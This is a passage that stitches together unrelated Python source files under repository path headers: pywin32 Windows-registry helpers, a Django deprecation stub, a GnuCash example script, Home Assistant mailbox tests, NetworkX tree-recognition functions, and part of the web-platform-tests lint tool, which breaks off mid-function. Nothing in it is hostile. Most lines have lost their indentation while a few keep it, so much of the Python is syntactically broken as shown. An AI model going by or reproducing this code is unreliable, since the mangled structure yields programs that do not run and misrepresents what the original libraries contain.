"""Builds a string containing the path to the current registry key.
The Python registry key contains the Python version. This function
uses the version of the DLL used by the current process to get the
registry key currently in use.
"""
return "Software\\Python\\PythonCore\\" + sys.winver
def GetRootKey():
"""Retrieves the Registry root in use by Python.
"""
keyname = BuildDefaultPythonKey()
try:
k = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyname)
k.close()
return win32con.HKEY_CURRENT_USER
except win32api.error:
return win32con.HKEY_LOCAL_MACHINE
def GetRegistryDefaultValue(subkey, rootkey = None):
"""A helper to return the default value for a key in the registry.
"""
if rootkey is None: rootkey = GetRootKey()
return win32api.RegQueryValue(rootkey, subkey)
def SetRegistryDefaultValue(subKey, value, rootkey = None):
"""A helper to set the default value for a key in the registry
"""
if rootkey is None: rootkey = GetRootKey()
if type(value)==str:
typeId = win32con.REG_SZ
elif type(value)==int:
typeId = win32con.REG_DWORD
else:
raise TypeError("Value must be string or integer - was passed " + repr(value))
    win32api.RegSetValue(rootkey, subKey, typeId, value)
def GetAppPathsKey():
return "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths"
def RegisterPythonExe(exeFullPath, exeAlias = None, exeAppPath = None):
"""Register a .exe file that uses Python.
Registers the .exe with the OS. This allows the specified .exe to
be run from the command-line or start button without using the full path,
    and also to set up an application-specific path (i.e., os.environ['PATH']).
    The exeAppPath argument is not currently supported, so this function is
    general purpose and not specific to Python. Later, exeAppPath may provide
    a reasonable default.
exeFullPath -- The full path to the .exe
exeAlias = None -- An alias for the exe - if none, the base portion
of the filename is used.
exeAppPath -- Not supported.
"""
    # Note - Doesn't work on win32s (but we don't care anymore!)
if exeAppPath:
raise error("Do not support exeAppPath argument currently")
if exeAlias is None:
exeAlias = os.path.basename(exeFullPath)
win32api.RegSetValue(GetRootKey(), GetAppPathsKey() + "\\" + exeAlias, win32con.REG_SZ, exeFullPath)
def GetRegisteredExe(exeAlias):
"""Get a registered .exe
"""
return win32api.RegQueryValue(GetRootKey(), GetAppPathsKey() + "\\" + exeAlias)
def UnregisterPythonExe(exeAlias):
"""Unregister a .exe file that uses Python.
"""
try:
win32api.RegDeleteKey(GetRootKey(), GetAppPathsKey() + "\\" + exeAlias)
except win32api.error, exc:
import winerror
if exc.winerror!=winerror.ERROR_FILE_NOT_FOUND:
raise
return
def RegisterNamedPath(name, path):
"""Register a named path - ie, a named PythonPath entry.
"""
keyStr = BuildDefaultPythonKey() + "\\PythonPath"
if name: keyStr = keyStr + "\\" + name
win32api.RegSetValue(GetRootKey(), keyStr, win32con.REG_SZ, path)
def UnregisterNamedPath(name):
"""Unregister a named path - ie, a named PythonPath entry.
"""
keyStr = BuildDefaultPythonKey() + "\\PythonPath\\" + name
try:
win32api.RegDeleteKey(GetRootKey(), keyStr)
except win32api.error, exc:
import winerror
if exc.winerror!=winerror.ERROR_FILE_NOT_FOUND:
raise
return
def GetRegisteredNamedPath(name):
"""Get a registered named path, or None if it doesnt exist.
"""
keyStr = BuildDefaultPythonKey() + "\\PythonPath"
if name: keyStr = keyStr + "\\" + name
try:
return win32api.RegQueryValue(GetRootKey(), keyStr)
except win32api.error, exc:
import winerror
if exc.winerror!=winerror.ERROR_FILE_NOT_FOUND:
raise
return None
def RegisterModule(modName, modPath):
"""Register an explicit module in the registry. This forces the Python import
mechanism to locate this module directly, without a sys.path search. Thus
a registered module need not appear in sys.path at all.
modName -- The name of the module, as used by import.
modPath -- The full path and file name of the module.
"""
try:
import os
os.stat(modPath)
except os.error:
print "Warning: Registering non-existant module %s" % modPath
win32api.RegSetValue(GetRootKey(),
BuildDefaultPythonKey() + "\\Modules\\%s" % modName,
win32con.REG_SZ, modPath)
def UnregisterModule(modName):
"""Unregister an explicit module in the registry.
modName -- The name of the module, as used by import.
"""
try:
win32api.RegDeleteKey(GetRootKey(),
BuildDefaultPythonKey() + "\\Modules\\%s" % modName)
except win32api.error, exc:
import winerror
if exc.winerror!=winerror.ERROR_FILE_NOT_FOUND:
raise
def GetRegisteredHelpFile(helpDesc):
"""Given a description, return the registered entry.
"""
try:
return GetRegistryDefaultValue(BuildDefaultPythonKey() + "\\Help\\" + helpDesc)
except win32api.error:
try:
return GetRegistryDefaultValue(BuildDefaultPythonKey() + "\\Help\\" + helpDesc, win32con.HKEY_CURRENT_USER)
except win32api.error:
pass
return None
def RegisterHelpFile(helpFile, helpPath, helpDesc = None, bCheckFile = 1):
"""Register a help file in the registry.
    Note that this used to support writing to the Windows Help
    key; however, this is no longer done, as it seems to be incompatible.
helpFile -- the base name of the help file.
helpPath -- the path to the help file
helpDesc -- A description for the help file. If None, the helpFile param is used.
bCheckFile -- A flag indicating if the file existence should be checked.
"""
if helpDesc is None: helpDesc = helpFile
fullHelpFile = os.path.join(helpPath, helpFile)
try:
if bCheckFile: os.stat(fullHelpFile)
except os.error:
raise ValueError("Help file does not exist")
# Now register with Python itself.
win32api.RegSetValue(GetRootKey(),
BuildDefaultPythonKey() + "\\Help\\%s" % helpDesc, win32con.REG_SZ, fullHelpFile)
def UnregisterHelpFile(helpFile, helpDesc = None):
"""Unregister a help file in the registry.
helpFile -- the base name of the help file.
helpDesc -- A description for the help file. If None, the helpFile param is used.
"""
key = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\Help", 0, win32con.KEY_ALL_ACCESS)
try:
try:
win32api.RegDeleteValue(key, helpFile)
except win32api.error, exc:
import winerror
if exc.winerror!=winerror.ERROR_FILE_NOT_FOUND:
raise
finally:
win32api.RegCloseKey(key)
# Now de-register with Python itself.
if helpDesc is None: helpDesc = helpFile
try:
win32api.RegDeleteKey(GetRootKey(),
BuildDefaultPythonKey() + "\\Help\\%s" % helpDesc)
except win32api.error, exc:
import winerror
if exc.winerror!=winerror.ERROR_FILE_NOT_FOUND:
raise
def RegisterCoreDLL(coredllName = None):
"""Registers the core DLL in the registry.
If no params are passed, the name of the Python DLL used in
the current process is used and registered.
"""
if coredllName is None:
coredllName = win32api.GetModuleFileName(sys.dllhandle)
# must exist!
else:
try:
os.stat(coredllName)
except os.error:
print "Warning: Registering non-existant core DLL %s" % coredllName
hKey = win32api.RegCreateKey(GetRootKey() , BuildDefaultPythonKey())
try:
win32api.RegSetValue(hKey, "Dll", win32con.REG_SZ, coredllName)
finally:
win32api.RegCloseKey(hKey)
# Lastly, setup the current version to point to me.
win32api.RegSetValue(GetRootKey(), "Software\\Python\\PythonCore\\CurrentVersion", win32con.REG_SZ, sys.winver)
def RegisterFileExtensions(defPyIcon, defPycIcon, runCommand):
"""Register the core Python file extensions.
defPyIcon -- The default icon to use for .py files, in 'fname,offset' format.
defPycIcon -- The default icon to use for .pyc files, in 'fname,offset' format.
runCommand -- The command line to use for running .py files
"""
# Register the file extensions.
pythonFileId = RegistryIDPyFile
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , ".py", win32con.REG_SZ, pythonFileId)
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , pythonFileId , win32con.REG_SZ, "Python File")
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , "%s\\CLSID" % pythonFileId , win32con.REG_SZ, CLSIDPyFile)
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , "%s\\DefaultIcon" % pythonFileId, win32con.REG_SZ, defPyIcon)
base = "%s\\Shell" % RegistryIDPyFile
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , base + "\\Open", win32con.REG_SZ, "Run")
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , base + "\\Open\\Command", win32con.REG_SZ, runCommand)
# Register the .PYC.
pythonFileId = RegistryIDPycFile
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , ".pyc", win32con.REG_SZ, pythonFileId)
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , pythonFileId , win32con.REG_SZ, "Compiled Python File")
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , "%s\\DefaultIcon" % pythonFileId, win32con.REG_SZ, defPycIcon)
base = "%s\\Shell" % pythonFileId
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , base + "\\Open", win32con.REG_SZ, "Run")
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , base + "\\Open\\Command", win32con.REG_SZ, runCommand)
def RegisterShellCommand(shellCommand, exeCommand, shellUserCommand = None):
# Last param for "Open" - for a .py file to be executed by the command line
# or shell execute (eg, just entering "foo.py"), the Command must be "Open",
# but you may associate a different name for the right-click menu.
# In our case, normally we have "Open=Run"
base = "%s\\Shell" % RegistryIDPyFile
if shellUserCommand:
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , base + "\\%s" % (shellCommand), win32con.REG_SZ, shellUserCommand)
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , base + "\\%s\\Command" % (shellCommand), win32con.REG_SZ, exeCommand)
def RegisterDDECommand(shellCommand, ddeApp, ddeTopic, ddeCommand):
base = "%s\\Shell" % RegistryIDPyFile
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , base + "\\%s\\ddeexec" % (shellCommand), win32con.REG_SZ, ddeCommand)
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , base + "\\%s\\ddeexec\\Application" % (shellCommand), win32con.REG_SZ, ddeApp)
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , base + "\\%s\\ddeexec\\Topic" % (shellCommand), win32con.REG_SZ, ddeTopic)
|
barma1309/Kalista | refs/heads/master | .virtualenvs/Kalista/lib/python3.4/site-packages/django/contrib/webdesign/__init__.py | 264 | import warnings
from django.utils.deprecation import RemovedInDjango110Warning
default_app_config = 'django.contrib.webdesign.apps.WebDesignConfig'
warnings.warn(
"django.contrib.webdesign will be removed in Django 1.10. The "
"{% lorem %} tag is now included in the built-in tags.",
RemovedInDjango110Warning
)
|
slisson/intellij-community | refs/heads/master | python/testData/intentions/beforeTransformConditionalExpression.py | 83 | x = a if <caret>cond else b |
taladar/gnucash | refs/heads/master | src/optional/python-bindings/example_scripts/simple_sqlite_create.py | 1 | #!/usr/bin/env python
from gnucash import Session, Account
from os.path import abspath
from gnucash.gnucash_core_c import ACCT_TYPE_ASSET
s = Session('sqlite3://%s' % abspath('test.blob'), True)
# this seems to make a difference in more complex cases
s.save()
book = s.book
root = book.get_root_account()
a = Account(book)
root.append_child(a)
a.SetName('wow')
a.SetType(ACCT_TYPE_ASSET)
commod_table = book.get_table()
a.SetCommodity( commod_table.lookup('CURRENCY', 'CAD') )
s.save()
s.end()
|
auduny/home-assistant | refs/heads/dev | tests/components/mailbox/test_init.py | 12 | """The tests for the mailbox component."""
import asyncio
from hashlib import sha1
import pytest
from homeassistant.bootstrap import async_setup_component
import homeassistant.components.mailbox as mailbox
@pytest.fixture
def mock_http_client(hass, hass_client):
"""Start the Hass HTTP component."""
config = {
mailbox.DOMAIN: {
'platform': 'demo'
}
}
hass.loop.run_until_complete(
async_setup_component(hass, mailbox.DOMAIN, config))
return hass.loop.run_until_complete(hass_client())
@asyncio.coroutine
def test_get_platforms_from_mailbox(mock_http_client):
"""Get platforms from mailbox."""
url = "/api/mailbox/platforms"
req = yield from mock_http_client.get(url)
assert req.status == 200
result = yield from req.json()
assert len(result) == 1 and "DemoMailbox" == result[0].get('name', None)
@asyncio.coroutine
def test_get_messages_from_mailbox(mock_http_client):
"""Get messages from mailbox."""
url = "/api/mailbox/messages/DemoMailbox"
req = yield from mock_http_client.get(url)
assert req.status == 200
result = yield from req.json()
assert len(result) == 10
@asyncio.coroutine
def test_get_media_from_mailbox(mock_http_client):
"""Get audio from mailbox."""
mp3sha = "3f67c4ea33b37d1710f772a26dd3fb43bb159d50"
msgtxt = ("Message 1. "
"Lorem ipsum dolor sit amet, consectetur adipiscing elit. ")
msgsha = sha1(msgtxt.encode('utf-8')).hexdigest()
url = "/api/mailbox/media/DemoMailbox/%s" % (msgsha)
req = yield from mock_http_client.get(url)
assert req.status == 200
data = yield from req.read()
assert sha1(data).hexdigest() == mp3sha
@asyncio.coroutine
def test_delete_from_mailbox(mock_http_client):
"""Get audio from mailbox."""
msgtxt1 = ("Message 1. "
"Lorem ipsum dolor sit amet, consectetur adipiscing elit. ")
msgtxt2 = ("Message 3. "
"Lorem ipsum dolor sit amet, consectetur adipiscing elit. ")
msgsha1 = sha1(msgtxt1.encode('utf-8')).hexdigest()
msgsha2 = sha1(msgtxt2.encode('utf-8')).hexdigest()
for msg in [msgsha1, msgsha2]:
url = "/api/mailbox/delete/DemoMailbox/%s" % (msg)
req = yield from mock_http_client.delete(url)
assert req.status == 200
url = "/api/mailbox/messages/DemoMailbox"
req = yield from mock_http_client.get(url)
assert req.status == 200
result = yield from req.json()
assert len(result) == 8
@asyncio.coroutine
def test_get_messages_from_invalid_mailbox(mock_http_client):
"""Get messages from mailbox."""
url = "/api/mailbox/messages/mailbox.invalid_mailbox"
req = yield from mock_http_client.get(url)
assert req.status == 404
@asyncio.coroutine
def test_get_media_from_invalid_mailbox(mock_http_client):
"""Get messages from mailbox."""
msgsha = "0000000000000000000000000000000000000000"
url = "/api/mailbox/media/mailbox.invalid_mailbox/%s" % (msgsha)
req = yield from mock_http_client.get(url)
assert req.status == 404
@asyncio.coroutine
def test_get_media_from_invalid_msgid(mock_http_client):
"""Get messages from mailbox."""
msgsha = "0000000000000000000000000000000000000000"
url = "/api/mailbox/media/DemoMailbox/%s" % (msgsha)
req = yield from mock_http_client.get(url)
assert req.status == 500
@asyncio.coroutine
def test_delete_from_invalid_mailbox(mock_http_client):
"""Get audio from mailbox."""
msgsha = "0000000000000000000000000000000000000000"
url = "/api/mailbox/delete/mailbox.invalid_mailbox/%s" % (msgsha)
req = yield from mock_http_client.delete(url)
assert req.status == 404
|
OTWillems/GEO1005 | refs/heads/master | SpatialDecision/external/networkx/algorithms/tree/recognition.py | 28 | #-*- coding: utf-8 -*-
"""
Recognition Tests
=================
A *forest* is an acyclic, undirected graph, and a *tree* is a connected forest.
Depending on the subfield, there are various conventions for generalizing these
definitions to directed graphs.
In one convention, directed variants of forest and tree are defined in an
identical manner, except that the direction of the edges is ignored. In effect,
each directed edge is treated as a single undirected edge. Then, additional
restrictions are imposed to define *branchings* and *arborescences*.
In another convention, directed variants of forest and tree correspond to
the previous convention's branchings and arborescences, respectively. Then two
new terms, *polyforest* and *polytree*, are defined to correspond to the other
convention's forest and tree.
Summarizing::
    +--------------+--------------+
    | Convention A | Convention B |
    +==============+==============+
    | forest       | polyforest   |
    | tree         | polytree     |
    | branching    | forest       |
    | arborescence | tree         |
    +--------------+--------------+
Each convention has its reasons. The first convention emphasizes definitional
similarity in that directed forests and trees are only concerned with
acyclicity and do not have an in-degree constraint, just as their undirected
counterparts do not. The second convention emphasizes functional similarity
in the sense that the directed analog of a spanning tree is a spanning
arborescence. That is, take any spanning tree and choose one node as the root.
Then every edge is assigned a direction such there is a directed path from the
root to every other node. The result is a spanning arborescence.
NetworkX follows convention "A". Explicitly, these are:
undirected forest
An undirected graph with no undirected cycles.
undirected tree
A connected, undirected forest.
directed forest
A directed graph with no undirected cycles. Equivalently, the underlying
graph structure (which ignores edge orientations) is an undirected forest.
In convention B, this is known as a polyforest.
directed tree
A weakly connected, directed forest. Equivalently, the underlying graph
structure (which ignores edge orientations) is an undirected tree. In
convention B, this is known as a polytree.
branching
A directed forest with each node having, at most, one parent. So the maximum
in-degree is equal to 1. In convention B, this is known as a forest.
arborescence
A directed tree with each node having, at most, one parent. So the maximum
in-degree is equal to 1. In convention B, this is known as a tree.
For trees and arborescences, the adjective "spanning" may be added to designate
that the graph, when considered as a forest/branching, consists of a single
tree/arborescence that includes all nodes in the graph. It is true, by
definition, that every tree/arborescence is spanning with respect to the nodes
that define the tree/arborescence and so, it might seem redundant to introduce
the notion of "spanning". However, the nodes may represent a subset of
nodes from a larger graph, and it is in this context that the term "spanning"
becomes a useful notion.
"""
import networkx as nx
__author__ = """\n""".join([
'Ferdinando Papale <[email protected]>',
'chebee7i <[email protected]>',
])
__all__ = ['is_arborescence', 'is_branching', 'is_forest', 'is_tree']
@nx.utils.not_implemented_for('undirected')
def is_arborescence(G):
"""
Returns ``True`` if ``G`` is an arborescence.
An arborescence is a directed tree with maximum in-degree equal to 1.
Parameters
----------
G : graph
The graph to test.
Returns
-------
b : bool
A boolean that is ``True`` if ``G`` is an arborescence.
Notes
-----
In another convention, an arborescence is known as a *tree*.
See Also
--------
is_tree
"""
if not is_tree(G):
return False
if max(G.in_degree().values()) > 1:
return False
return True
@nx.utils.not_implemented_for('undirected')
def is_branching(G):
"""
Returns ``True`` if ``G`` is a branching.
A branching is a directed forest with maximum in-degree equal to 1.
Parameters
----------
G : directed graph
The directed graph to test.
Returns
-------
b : bool
A boolean that is ``True`` if ``G`` is a branching.
Notes
-----
In another convention, a branching is also known as a *forest*.
See Also
--------
is_forest
"""
if not is_forest(G):
return False
if max(G.in_degree().values()) > 1:
return False
return True
def is_forest(G):
"""
Returns ``True`` if ``G`` is a forest.
A forest is a graph with no undirected cycles.
For directed graphs, ``G`` is a forest if the underlying graph is a forest.
The underlying graph is obtained by treating each directed edge as a single
undirected edge in a multigraph.
Parameters
----------
G : graph
The graph to test.
Returns
-------
b : bool
A boolean that is ``True`` if ``G`` is a forest.
Notes
-----
In another convention, a directed forest is known as a *polyforest* and
then *forest* corresponds to a *branching*.
See Also
--------
is_branching
"""
if len(G) == 0:
raise nx.exception.NetworkXPointlessConcept('G has no nodes.')
if G.is_directed():
components = nx.weakly_connected_component_subgraphs
else:
components = nx.connected_component_subgraphs
for component in components(G):
# Make sure the component is a tree.
if component.number_of_edges() != component.number_of_nodes() - 1:
return False
return True
def is_tree(G):
"""
Returns ``True`` if ``G`` is a tree.
A tree is a connected graph with no undirected cycles.
For directed graphs, ``G`` is a tree if the underlying graph is a tree. The
underlying graph is obtained by treating each directed edge as a single
undirected edge in a multigraph.
Parameters
----------
G : graph
The graph to test.
Returns
-------
b : bool
A boolean that is ``True`` if ``G`` is a tree.
Notes
-----
In another convention, a directed tree is known as a *polytree* and then
*tree* corresponds to an *arborescence*.
See Also
--------
is_arborescence
"""
if len(G) == 0:
raise nx.exception.NetworkXPointlessConcept('G has no nodes.')
# A connected graph with no cycles has n-1 edges.
if G.number_of_edges() != len(G) - 1:
return False
if G.is_directed():
is_connected = nx.is_weakly_connected
else:
is_connected = nx.is_connected
return is_connected(G)
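def _example_usage():
    # Illustrative sketch (not part of the original module): a directed path
    # graph is a tree and, because no node has in-degree greater than 1, it
    # is also an arborescence.
    G = nx.DiGraph([(0, 1), (1, 2)])
    assert is_tree(G)
    assert is_arborescence(G)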
|
dati91/servo | refs/heads/master | tests/wpt/web-platform-tests/tools/lint/lint.py | 3 | from __future__ import print_function, unicode_literals
import abc
import argparse
import ast
import json
import os
import re
import subprocess
import sys
import tempfile
from collections import defaultdict
from . import fnmatch
from .. import localpaths
from ..gitignore.gitignore import PathFilter
from ..wpt import testfiles
from manifest.sourcefile import SourceFile, js_meta_re, python_meta_re, space_chars, get_any_variants, get_default_any_variants
from six import binary_type, iteritems, itervalues
from six.moves import range
from six.moves.urllib.parse import urlsplit, urljoin
import logging
logger = None
def setup_logging(prefix=False):
global logger
if logger is None:
logger = logging.getLogger(os.path.basename(os.path.splitext(__file__)[0]))
        # Only add a handler if the parent logger is missing a handler
        if logger.parent and len(logger.parent.handlers) == 0:
            handler = logging.StreamHandler(sys.stdout)
            logger.addHandler(handler)
if prefix:
format = logging.BASIC_FORMAT
else:
format = "%(message)s"
formatter = logging.Formatter(format)
for handler in logger.handlers:
handler.setFormatter(formatter)
logger.setLevel(logging.DEBUG)
setup_logging()
ERROR_MSG = """You must fix all errors; for details on how to fix them, see
https://web-platform-tests.org/writing-tests/lint-tool.html
However, instead of fixing a particular error, it's sometimes
OK to add a line to the lint.whitelist file in the root of the
web-platform-tests directory to make the lint tool ignore it.
For example, to make the lint tool ignore all '%s'
errors in the %s file,
you could add the following line to the lint.whitelist file.
%s: %s"""
def all_filesystem_paths(repo_root, subdir=None):
path_filter = PathFilter(repo_root, extras=[".git/"])
if subdir:
expanded_path = subdir
else:
expanded_path = repo_root
for dirpath, dirnames, filenames in os.walk(expanded_path):
for filename in filenames:
path = os.path.relpath(os.path.join(dirpath, filename), repo_root)
if path_filter(path):
yield path
dirnames[:] = [item for item in dirnames if
path_filter(os.path.relpath(os.path.join(dirpath, item) + "/",
repo_root)+"/")]
def _all_files_equal(paths):
"""
Checks all the paths are files that are byte-for-byte identical
:param paths: the list of paths to compare
:returns: True if they are all identical
"""
paths = list(paths)
if len(paths) < 2:
return True
first = paths.pop()
size = os.path.getsize(first)
if any(os.path.getsize(path) != size for path in paths):
return False
# Chunk this to avoid eating up memory and file descriptors
bufsize = 4096*4 # 16KB, a "reasonable" number of disk sectors
groupsize = 8 # Hypothesised to be large enough in the common case that everything fits in one group
with open(first, "rb") as first_f:
for start in range(0, len(paths), groupsize):
path_group = paths[start:start+groupsize]
first_f.seek(0)
try:
files = [open(x, "rb") for x in path_group]
for _ in range(0, size, bufsize):
a = first_f.read(bufsize)
for f in files:
b = f.read(bufsize)
if a != b:
return False
finally:
for f in files:
f.close()
return True
def check_path_length(repo_root, path):
if len(path) + 1 > 150:
return [("PATH LENGTH", "/%s longer than maximum path length (%d > 150)" % (path, len(path) + 1), path, None)]
return []
def check_worker_collision(repo_root, path):
endings = [(".any.html", ".any.js"),
(".any.worker.html", ".any.js"),
(".worker.html", ".worker.js")]
for path_ending, generated in endings:
if path.endswith(path_ending):
return [("WORKER COLLISION",
"path ends with %s which collides with generated tests from %s files" % (path_ending, generated),
path,
None)]
return []
def check_ahem_copy(repo_root, path):
lpath = path.lower()
if "ahem" in lpath and lpath.endswith(".ttf"):
return [("AHEM COPY", "Don't add extra copies of Ahem, use /fonts/Ahem.ttf", path, None)]
return []
def check_git_ignore(repo_root, paths):
errors = []
with tempfile.TemporaryFile('w+') as f:
f.write('\n'.join(paths))
f.seek(0)
try:
matches = subprocess.check_output(
["git", "check-ignore", "--verbose", "--no-index", "--stdin"], stdin=f)
for match in matches.strip().split('\n'):
match_filter, path = match.split()
_, _, filter_string = match_filter.split(':')
# If the matching filter reported by check-ignore is a special-case exception,
# that's fine. Otherwise, it requires a new special-case exception.
if filter_string[0] != '!':
errors += [("IGNORED PATH", "%s matches an ignore filter in .gitignore - "
"please add a .gitignore exception" % path, path, None)]
except subprocess.CalledProcessError:
# Nonzero return code means that no match exists.
pass
return errors
drafts_csswg_re = re.compile(r"https?\:\/\/drafts\.csswg\.org\/([^/?#]+)")
w3c_tr_re = re.compile(r"https?\:\/\/www\.w3c?\.org\/TR\/([^/?#]+)")
w3c_dev_re = re.compile(r"https?\:\/\/dev\.w3c?\.org\/[^/?#]+\/([^/?#]+)")
def check_css_globally_unique(repo_root, paths):
"""
Checks that CSS filenames are sufficiently unique
This groups files by path classifying them as "test", "reference", or
"support".
"test" files must have a unique name across files that share links to the
same spec.
"reference" and "support" files, on the other hand, must have globally
unique names.
:param repo_root: the repository root
:param paths: list of all paths
:returns: a list of errors found in ``paths``
"""
test_files = defaultdict(set)
ref_files = defaultdict(set)
support_files = defaultdict(set)
for path in paths:
if os.name == "nt":
path = path.replace("\\", "/")
if not path.startswith("css/"):
continue
source_file = SourceFile(repo_root, path, "/")
if source_file.name_is_non_test:
# If we're name_is_non_test for a reason apart from support, ignore it.
# We care about support because of the requirement all support files in css/ to be in
# a support directory; see the start of check_parsed.
offset = path.find("/support/")
if offset == -1:
continue
parts = source_file.dir_path.split(os.path.sep)
if (parts[0] in source_file.root_dir_non_test or
any(item in source_file.dir_non_test - {"support"} for item in parts) or
any(parts[:len(non_test_path)] == list(non_test_path) for non_test_path in source_file.dir_path_non_test)):
continue
name = path[offset+1:]
support_files[name].add(path)
elif source_file.name_is_reference:
ref_files[source_file.name].add(path)
else:
test_files[source_file.name].add(path)
errors = []
for name, colliding in iteritems(test_files):
if len(colliding) > 1:
if not _all_files_equal([os.path.join(repo_root, x) for x in colliding]):
# Only compute by_spec if there are prima-facie collisions because of cost
by_spec = defaultdict(set)
for path in colliding:
source_file = SourceFile(repo_root, path, "/")
for link in source_file.spec_links:
for r in (drafts_csswg_re, w3c_tr_re, w3c_dev_re):
m = r.match(link)
if m:
spec = m.group(1)
break
else:
continue
by_spec[spec].add(path)
for spec, paths in iteritems(by_spec):
if not _all_files_equal([os.path.join(repo_root, x) for x in paths]):
for x in paths:
errors.append(("CSS-COLLIDING-TEST-NAME",
"The filename %s in the %s testsuite is shared by: %s"
% (name,
spec,
", ".join(sorted(paths))),
x,
None))
for error_name, d in [("CSS-COLLIDING-REF-NAME", ref_files),
("CSS-COLLIDING-SUPPORT-NAME", support_files)]:
for name, colliding in iteritems(d):
if len(colliding) > 1:
if not _all_files_equal([os.path.join(repo_root, x) for x in colliding]):
for x in colliding:
errors.append((error_name,
"The filename %s is shared by: %s" % (name,
", ".join(sorted(colliding))),
x,
None))
return errors
def parse_whitelist(f):
"""
Parse the whitelist file given by `f`, and return the parsed structure.
"""
data = defaultdict(lambda:defaultdict(set))
ignored_files = set()
for line in f:
line = line.strip()
if not line or line.startswith("#"):
continue
parts = [item.strip() for item in line.split(":")]
if len(parts) == 2:
parts.append(None)
else:
parts[-1] = int(parts[-1])
error_types, file_match, line_number = parts
error_types = {item.strip() for item in error_types.split(",")}
file_match = os.path.normcase(file_match)
if "*" in error_types:
ignored_files.add(file_match)
else:
for error_type in error_types:
data[error_type][file_match].add(line_number)
return data, ignored_files
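# Illustrative sketch (not part of the original module): whitelist lines have
# the form "ERROR TYPE[, ERROR TYPE]: path-glob[: line]", for example
# (hypothetical paths):
#
#   SET TIMEOUT: html/dom/example.html
#   TRAILING WHITESPACE, INDENT TABS: css/vendor-imports/*
#   CR AT EOL: streams/resources/test-utils.js: 12
#
# An error type of "*" causes matching files to be ignored entirely.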
def filter_whitelist_errors(data, errors):
"""
Filter out those errors that are whitelisted in `data`.
"""
if not errors:
return []
whitelisted = [False for item in range(len(errors))]
for i, (error_type, msg, path, line) in enumerate(errors):
normpath = os.path.normcase(path)
# Allow whitelisting all lint errors except the IGNORED PATH lint,
# which explains how to fix it correctly and shouldn't be ignored.
if error_type in data and error_type != "IGNORED PATH":
wl_files = data[error_type]
for file_match, allowed_lines in iteritems(wl_files):
if None in allowed_lines or line in allowed_lines:
if fnmatch.fnmatchcase(normpath, file_match):
whitelisted[i] = True
return [item for i, item in enumerate(errors) if not whitelisted[i]]
class Regexp(object):
pattern = None
file_extensions = None
error = None
_re = None
def __init__(self):
self._re = re.compile(self.pattern)
def applies(self, path):
return (self.file_extensions is None or
os.path.splitext(path)[1] in self.file_extensions)
def search(self, line):
return self._re.search(line)
class TrailingWhitespaceRegexp(Regexp):
pattern = b"[ \t\f\v]$"
error = "TRAILING WHITESPACE"
description = "Whitespace at EOL"
class TabsRegexp(Regexp):
pattern = b"^\t"
error = "INDENT TABS"
description = "Tabs used for indentation"
class CRRegexp(Regexp):
pattern = b"\r$"
error = "CR AT EOL"
description = "CR character in line separator"
class SetTimeoutRegexp(Regexp):
pattern = b"setTimeout\s*\("
error = "SET TIMEOUT"
file_extensions = [".html", ".htm", ".js", ".xht", ".xhtml", ".svg"]
description = "setTimeout used; step_timeout should typically be used instead"
class W3CTestOrgRegexp(Regexp):
pattern = b"w3c\-test\.org"
error = "W3C-TEST.ORG"
description = "External w3c-test.org domain used"
class WebPlatformTestRegexp(Regexp):
pattern = b"web\-platform\.test"
error = "WEB-PLATFORM.TEST"
description = "Internal web-platform.test domain used"
class Webidl2Regexp(Regexp):
pattern = b"webidl2\.js"
error = "WEBIDL2.JS"
description = "Legacy webidl2.js script used"
class ConsoleRegexp(Regexp):
pattern = b"console\.[a-zA-Z]+\s*\("
error = "CONSOLE"
file_extensions = [".html", ".htm", ".js", ".xht", ".xhtml", ".svg"]
description = "Console logging API used"
class GenerateTestsRegexp(Regexp):
pattern = b"generate_tests\s*\("
error = "GENERATE_TESTS"
file_extensions = [".html", ".htm", ".js", ".xht", ".xhtml", ".svg"]
description = "generate_tests used"
class PrintRegexp(Regexp):
pattern = b"print(?:\s|\s*\()"
error = "PRINT STATEMENT"
file_extensions = [".py"]
description = "Print function used"
class LayoutTestsRegexp(Regexp):
pattern = b"eventSender|testRunner|window\.internals"
error = "LAYOUTTESTS APIS"
file_extensions = [".html", ".htm", ".js", ".xht", ".xhtml", ".svg"]
description = "eventSender/testRunner/window.internals used; these are LayoutTests-specific APIs (WebKit/Blink)"
class SpecialPowersRegexp(Regexp):
pattern = b"SpecialPowers"
error = "SPECIALPOWERS API"
file_extensions = [".html", ".htm", ".js", ".xht", ".xhtml", ".svg"]
description = "SpecialPowers used; this is gecko-specific and not supported in wpt"
regexps = [item() for item in
[TrailingWhitespaceRegexp,
TabsRegexp,
CRRegexp,
SetTimeoutRegexp,
W3CTestOrgRegexp,
WebPlatformTestRegexp,
Webidl2Regexp,
ConsoleRegexp,
GenerateTestsRegexp,
PrintRegexp,
LayoutTestsRegexp,
SpecialPowersRegexp]]
def check_regexp_line(repo_root, path, f):
errors = []
applicable_regexps = [regexp for regexp in regexps if regexp.applies(path)]
for i, line in enumerate(f):
for regexp in applicable_regexps:
if regexp.search(line):
errors.append((regexp.error, regexp.description, path, i+1))
return errors
def check_parsed(repo_root, path, f):
source_file = SourceFile(repo_root, path, "/", contents=f.read())
errors = []
if path.startswith("css/"):
if (source_file.type == "support" and
not source_file.name_is_non_test and
not source_file.name_is_reference):
return [("SUPPORT-WRONG-DIR", "Support file not in support directory", path, None)]
if (source_file.type != "support" and
not source_file.name_is_reference and
not source_file.spec_links):
return [("MISSING-LINK", "Testcase file must have a link to a spec", path, None)]
if source_file.name_is_non_test:
return []
if source_file.markup_type is None:
return []
if source_file.root is None:
